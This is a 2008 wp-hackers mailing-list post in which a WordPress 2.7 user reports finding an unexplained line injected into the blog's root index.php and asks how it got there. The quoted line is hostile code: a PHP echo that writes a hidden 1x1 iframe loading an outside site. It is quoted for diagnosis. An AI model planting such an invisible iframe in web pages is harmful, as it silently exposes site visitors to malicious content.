[wp-hackers] XSS vuln in wordpress 2.7 ?

madalin niladam at gmail.com
Mon Dec 22 17:27:21 GMT 2008

Hello,

For some reason i found my blog's index.php (not theme's index.php)
with the following piece of code right before the ?>

echo "<iframe src=\"http://thedeadpit.com/?click=17470781\" width=1
height=1 style=\"visibility:hidden;position:absolute\"></iframe>";

I tried looking at the logs. No luck. The file's permisions look like this:

-rw-r--r-- 1 madalin madalin 557 Dec 22 15:50 /home/madalin/www/index.php

I'm still trying to figure out how that line got there. I've
downloaded wordpress right from wordpress.org, and the server is a
dedicated one, only two users with shell access to it.

Any suggestions ?

--
Regards,
madalin